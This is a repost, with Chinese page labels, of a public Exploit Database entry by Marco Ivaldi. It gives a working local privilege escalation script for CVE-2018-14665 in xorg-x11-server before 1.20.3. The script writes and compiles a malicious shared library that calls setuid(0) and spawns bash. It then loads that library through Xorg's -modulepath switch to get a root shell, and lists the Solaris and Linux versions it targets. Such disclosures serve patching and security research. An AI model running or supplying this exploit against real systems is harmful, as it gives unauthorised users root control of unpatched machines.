xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation

• Exploit Database
• 37 阅读

• 作者： Marco Ivaldi
  日期： 2018-11-30
• 类别：

  • local
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/45922/

• #!/bin/sh
  
  #
  # raptor_xorgy - xorg-x11-server LPE via modulepath switch
  # Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>
  #
  # A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission 
  # check for -modulepath and -logfile options when starting Xorg. X server 
  # allows unprivileged users with the ability to log in to the system via 
  # physical console to escalate their privileges and run arbitrary code under 
  # root privileges (CVE-2018-14665).
  #
  # This exploit variant triggers the bug in the -modulepath command line switch
  # to load a malicious X11 module in order to escalate privileges to root on
  # vulnerable systems. This technique is less invasive than exploiting the 
  # -logfile switch, however the gcc compiler must be present in order for it to
  # work out of the box. Alternatively, you must use a pre-compiled malicious .so
  # compatible with the target system and modify the exploit accordingly.
  #
  # It works very reliably on Solaris 11.4 and should work on most vulnerable
  # Linux distributions (though I haven't tested it). For some reason, it fails to
  # obtain uid 0 on OpenBSD... They might have an additional protection in place.
  #
  # Thanks to @alanc and @nushinde for discussing this alternative vector.
  #
  # See also:
  # https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm
  # https://github.com/0xdea/exploits/blob/master/solaris/raptor_solgasm
  # https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html
  # https://nvd.nist.gov/vuln/detail/CVE-2006-0745
  #
  # Usage:
  # raptor@stalker:~$ chmod +x raptor_xorgy
  # raptor@stalker:~$ ./raptor_xorgy
  # [...]
  # root@stalker:~# id
  # uid=0(root) gid=0(root)
  #
  # Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):
  # Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]
  # Oracle Solaris 11 SPARC [untested]
  # CentOS Linux 7 [untested, it should work]
  # Red Hat Enterprise Linux 7 [untested]
  # Ubuntu Linux 18.10 [untested]
  # Ubuntu Linux 18.04 LTS [untested]
  # Ubuntu Linux 16.04 LTS [untested]
  # Debian GNU/Linux 9 [untested]
  # [...]
  #
  
  echo "raptor_xorgy - xorg-x11-server LPE via modulepath switch"
  echo "Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>"
  echo
  
  # prepare the payload
  cat << EOF > /tmp/pwned.c
  _init()
  {
  	setuid(0);
  	setgid(0);
  	system("/bin/bash");
  }
  EOF
  # libglx.so should be a good target, refer to Xorg logs for other candidates
  gcc -fPIC -shared -nostartfiles -w /tmp/pwned.c -o /tmp/libglx.so
  if [ $? -ne 0 ]; then echo; echo "error: cannot compile /tmp/pwned.c"; exit; fi
  
  # trigger the bug
  echo "Got root?"
  Xorg -modulepath ",/tmp" :1